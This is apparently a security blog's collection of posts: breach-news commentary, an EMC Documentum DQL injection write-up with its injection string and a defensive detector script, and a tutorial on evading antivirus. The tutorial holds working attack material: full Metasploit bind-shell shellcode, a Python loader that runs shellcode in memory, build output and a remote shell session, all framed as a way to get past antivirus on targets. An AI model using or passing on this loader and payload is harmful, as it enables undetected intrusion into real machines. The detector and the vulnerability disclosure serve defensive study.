Paddy Power Notifies Customers of Data Breach… Four Years Late

Irish bookmaker Paddy Power has admitted that personal details of more than 600,000 customers were stolen in a cyber-attack that occurred in 2010. The company revealed that it was aware of an attack on its system four years ago but failed to inform customers of the security breach.

Data including names, usernames, postal addresses, email addresses, phone numbers, dates of birth as well as security questions and answers were stolen, although it’s not thought that financial information was accessed or that any customer accounts were violated. The company was informed in May this year that a man in Canada had a large database of customer information, but it remains unclear how long Paddy Power has known about this security breach, or whether they knew the full extent of it.

Failing to inform people of a data leak in good time leaves customers exposed to the danger of identity theft. Any security breach, no matter how big or small, should be taken seriously by organisations and communicated to customers to enable them to take necessary steps to minimise the damage caused to them personally. It’s also essential that an organisation properly investigates how the data was stolen and closes off any vulnerability that may have enabled the theft.

In this instance the information stolen placed affected account holders at severe risk of further social engineering attacks and identity theft. While a security breach will always draw negative attention, it is always better to communicate quickly and openly to restore customer trust and ensure that customers are better protected against further attacks.

Documentum DQL Injection / ESA-2014-046

Before naming your vulnerabilities became cool (Heartbleed anyone?) I discovered an issue in the EMC Documentum software and internally called it “injeception”. Now that naming your vulnerability is so mainstream I will just call it ESA-2014-046 (which, surprisingly, matches the name used by the vendor!)

But why that name? Well, it’s 2014 and they have released 45 other vulner…. Oh, you mean the injeception? Well, because it is an injection inside an injection. Let me explain how it works:

  • The EMC Documentum software uses an abstraction layer to allow the software to use any backend database server, such as Oracle or MSSQL. This layer uses its own query language (DQL, Documentum Query Language), and this is the first part needed for the injeception to work.
  • I found an issue (CVE-2014-2508) that allows me to inject DQL at the end of a query. Descriptive error messages also helped me understand what was happening on the backend.
    • We are now at the DQL level (moving up from the app level we were at before), but we are still confined to the ORM system that EMC has in place to prevent users from one unit/department accessing files from other departments.
    • Reviewing the DQL Reference Manual I found references to two interesting keywords: ENABLE and ORACLE. The use of both can be seen on page 323 (Passthrough hints) of the manual. It essentially allows insertion of custom Oracle SQL (and presumably MSSQL, but I didn’t have the chance to try that) into the final query that is generated by the Documentum software. We have our third jump! (And I think this one is CVE-2014-2507, but I haven’t been credited for this one, so I am not sure if I am right in assuming this…)
      • Now we find ourselves in an interesting position: we are inside an Oracle hint. For those who don’t know (I didn’t at the time), hints are a special set of keywords that you can write between the SELECT and the first column of the query to improve performance. Like this:
        SELECT /* HINT */ 1 from dual;
      • So… can we escape from the hint syntax and execute code? Sure thing! If we write ‘*/’, Documentum passes it unescaped to the SQL query and we are able to inject any SQL query from our original DQL injection. Let’s go up a level again on this injection to construct the final valid query.
      • First we need to make our Oracle query:
        */ user FROM dual--
      • Now we need to add it into a valid DQL query:
        ENABLE(ORACLE('*/user FROM DUAL--'))
      • Finally, we have to add that string at the end of our DQL injection:
        table_field from valid_table ENABLE(ORACLE('*/user FROM DUAL--'));--
      • As you can see we need a valid table and a valid field, but I got those from the debug messages; the documentation might also help.

This way we have moved from a DQL injection (CVE-2014-2508) to a shell injection (CVE-2014-2507?) and can execute Oracle queries. But what about CVE-2014-2506? Well, the user running those Oracle queries has no privilege limitations, so it can access any information regardless of which department or OU the user executing the DQL is a member of, and it can even access configuration details from the server.
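As an added example (not part of the original post), here is a small Python checker a defender could run over DQL statements, for instance an application’s query log or a validation layer placed in front of the Documentum API, to spot passthrough hints whose text tries to close the comment the hint is wrapped in. The ENABLE(ORACLE('...')) syntax is the one shown above; the sample statements are constructed, and the assumption that a quote inside a DQL string literal is written as two single quotes is mine, not something the post states.

```python
import re

# Constructed sample DQL statements (not from the post); the last two mimic
# the passthrough-hint escape described above, the rest are benign.
SAMPLE_QUERIES = [
    "select object_name from dm_document where folder('/Finance')",
    "select r_object_id from dm_document ENABLE(RETURN_TOP 10)",
    "select object_name from dm_document ENABLE(ORACLE('INDEX(d idx1)'))",
    "select title from dm_document ENABLE(ORACLE('*/user FROM DUAL--'))",
    "select title from dm_document enable ( oracle ( '*/ 1 from dual -- ' ) )",
]

# Matches ENABLE(ORACLE('<hint text>')) and captures the hint text. Assumption:
# a single quote inside a DQL string literal is written as two single quotes.
PASSTHROUGH_RE = re.compile(
    r"ENABLE\s*\(\s*ORACLE\s*\(\s*'((?:[^']|'')*)'", re.IGNORECASE)

# Sequences that have no business inside an optimizer hint; "*/" is the one
# that breaks out of the /* ... */ comment Documentum wraps the hint in.
ESCAPE_CHECKS = [
    ("*/", "closes the /* */ hint comment"),
    ("--", "contains a line comment"),
    ("/*", "opens a nested comment"),
    (";", "contains a statement separator"),
]


def extract_hint(query):
    """Return the passthrough hint text of a DQL statement, or None if it has none."""
    match = PASSTHROUGH_RE.search(query)
    return match.group(1) if match else None


def inspect_hint(hint_text):
    """Return the reasons a hint text looks like an attempt to escape the hint comment."""
    return [reason for marker, reason in ESCAPE_CHECKS if marker in hint_text]


def classify(query):
    """'clean' (no passthrough), 'passthrough' (hint looks benign) or 'escape-attempt'."""
    hint = extract_hint(query)
    if hint is None:
        return "clean"
    return "escape-attempt" if inspect_hint(hint) else "passthrough"


def scan(queries):
    """Classify every statement; returns [(index, classification, reasons), ...]."""
    results = []
    for index, query in enumerate(queries):
        hint = extract_hint(query)
        reasons = inspect_hint(hint) if hint is not None else []
        results.append((index, classify(query), reasons))
    return results


if __name__ == "__main__":
    for index, verdict, reasons in scan(SAMPLE_QUERIES):
        print("%d: %-15s %s" % (index, verdict, "; ".join(reasons)))
```

A validation layer would reject anything classified as an escape attempt outright; a log review would treat every passthrough hint as worth a look, since the legitimate ones are rare enough to enumerate.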

Size Doesn’t Matter to Cyber-Attackers

A new report released by Damballa this week revealed that the average enterprise will have 18.5% of machines infected with malware, with the figure unchanged across larger and smaller organisations.

While the report focussed on enterprise-sized businesses, it is safe to say malware has no concept of business size: it merely seeks out vulnerabilities and exploits them, meaning any organisation that stores data is a potential target. This means that anyone from a small locally run business to a large multi-national corporation is exposed to the same threat level, with their risk level depending on how robust their cyber-security defences are.

A common trap to fall into, particularly for smaller businesses, is believing that they have nothing cyber-criminals would want to target and so don’t need to worry about cyber-security. Equally, some organisations hold the misconception that purchasing and implementing a security product inoculates their business against internet-borne threats.

This latest report, however, highlights that businesses of all sizes need to be aware that security is an ongoing process and that threat avoidance goes far beyond just having products in place. This includes ensuring that staff are made aware of best practice and receive training on common threats such as social engineering and phishing attacks.

There’s No Excuse for Failing to Fix Simple Security Flaws

Protecting a business and its customers against cyber-attack and data loss is a multi-faceted, relentless task that requires careful consideration and robust systems and policies. Some elements of this are more complex than others but ultimately those challenges can, and must, be overcome.

What there is no excuse for, however, is a business knowing about, and failing to rectify, a simple, easily fixable flaw in its cyber-security, as seen with PayPal this week. An Australian hacker alerted PayPal in June that a flaw existed in some aspects of its two-factor authentication system, making it possible to bypass, and went public with the flaw this week because it had still not been resolved.

A fundamental flaw such as this in how authentication is handled is easy to avoid, shouldn’t have been allowed to occur in the first place and, what’s more, is simple to fix. Two-factor authentication, when properly executed, can add invaluable layers of security, provided the user chooses a strong password.

It is critical that any flaw, whether it be simple or complex, large or small, is addressed quickly and efficiently to provide businesses and their customers with maximum security at all times. In this instance it would appear PayPal has been lucky that it has not suffered a major breach as it works to fix the issue. However, businesses can’t, and shouldn’t, rely on good fortune as a method of cyber-security.

LinkedIn Phishing Trips Pose Threat to Business – Not just Individuals

Hackers have once again been targeting LinkedIn users with new phishing emails, which aim to trick recipients into clicking on a link by claiming that their LinkedIn accounts have been blocked due to inactivity. While on the face of things this may seem like an issue for individuals with no cause for concern for businesses, nothing could be further from the truth.

While LinkedIn provides a rich source of personal information for attackers, it is how this information is used, once it is obtained, that should be a concern for businesses. Armed with personal data, including where an individual works, their job role and contact details, hackers will look to exploit this further in social engineering attacks, which could prove costly both to the individuals and the organisations they work for.

Phishing emails continue to be the most common source of information for social engineering attacks, and this further highlights why educating employees about the risks posed is of vital importance. By providing extensive education on data loss prevention, organisations will significantly reduce the chance of an attack, or of their employees unwittingly handing hackers ammunition to use in attacks against an organisation’s data.

Ex-Employees Pose Greater Threat Than Expected

New research published by IS Decisions this week suggests that more than a third of former employees still have access to company data and/or systems after they have left an organisation, with nearly 10% of employees polled admitting they had used their access/data rights after they had left an employer.

The findings of the report suggest that too many businesses have a culture of “out of sight, out of mind” where employee data access is concerned – a worrying trend given that such attitudes can drastically increase the scope for data loss.

The report makes five main recommendations, including better education on security among management; restricting concurrent access to systems; considering harsh penalties for transgressions; restricting network access to departments at certain times; and making the process of securely delegating work (and access to systems) a lot easier.

While these recommendations will certainly help tackle the issue, we believe that they should also include an effective DLP strategy that covers not only the types of data and where it is stored, but also which employees have permission to access it, from new joiners to contractors and those leaving the company. Organisations should be conducting regular audits to maintain best practice and, where applicable, revoke employee access. The potential risks that organisations expose themselves to by not considering employee permissions and access points can’t be overstated – and neglecting to deploy vigilant post-termination processes can leave companies wide open.

Execute Shellcode, Bypassing Anti-Virus…

Hello,

I am going to demonstrate a little trick that allows you to bypass anti-virus and execute shellcode. This is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell; however, any shellcode can be used, I have simply chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "\n" "," | sed s'/,//g' && echo ""
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
root@kali:~#

Copy the line of shellcode that gets returned, we will paste it into the binary later. Be aware, if you do change the payload the above command will not work as it is specific to that payload (for extracting the opcodes from the msfpayload output).

Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.

The following piece of Python code takes shellcode as input and moves it into the newly created memory space, finally executing it and bypassing anti-virus. Using VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject we achieve this. Here is the Python code:

#!C:\Python27\python.exe
# Python 2.7 script: the print statements and input() behaviour below are Python 2.

from ctypes import *

# Grab shellcode from the user so it's not hardcoded. In Python 2, input() evaluates
# what is typed, which is why the shellcode has to be pasted inside single quotes.
sc = bytearray(input("Paste the shellcode inside single quotes:\n\n"))
print "\n\nRunning shellcode in memory...\n\n"

# Reserves or commits a region of pages in the virtual address space of the calling process.
# The variable is named ptr rather than pointer so it does not shadow ctypes.pointer,
# which is needed for the CreateThread call below.
ptr = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))

buffer = (c_char * len(sc)).from_buffer(sc)

# The RtlMoveMemory routine copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(ptr),
                              buffer,
                              c_int(len(sc)))

# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(ptr),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))

# Waits until the specified object is in the signaled state or the time-out interval elapses.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, your shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to a win32 executable using PyInstaller:

C:\Users\mike.evans\Desktop\AV>c:\Python27\Scripts\pyinstaller.exe -F crypter2.py
82 INFO: wrote C:\Users\mike.evans\Desktop\AV\crypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:\Users\mike.evans\Desktop\AV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
2058 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_importers.py
3628 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_archive.py
3693 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_carchive.py
3752 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:\Windows\system32\python27.dll
4450 INFO: Warnings written to C:\Users\mike.evans\Desktop\AV\build\crypter2\warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:\Users\mike.evans\Desktop\AV\dist\crypter2.exe

Now we have the binary, let’s check VirusTotal and see what it scores:

[Image: VirusTotal scan result for crypter2.exe]

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:

C:\Users\mike.evans\Desktop\AV\dist>crypter2.exe
Paste the shellcode inside single quotes:

'\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5'

Running shellcode in memory...

Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\mike.evans\Desktop\AV\dist>whoami
whoami
win-2q626uv3pte\mike.evans

C:\Users\mike.evans\Desktop\AV\dist>

This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.
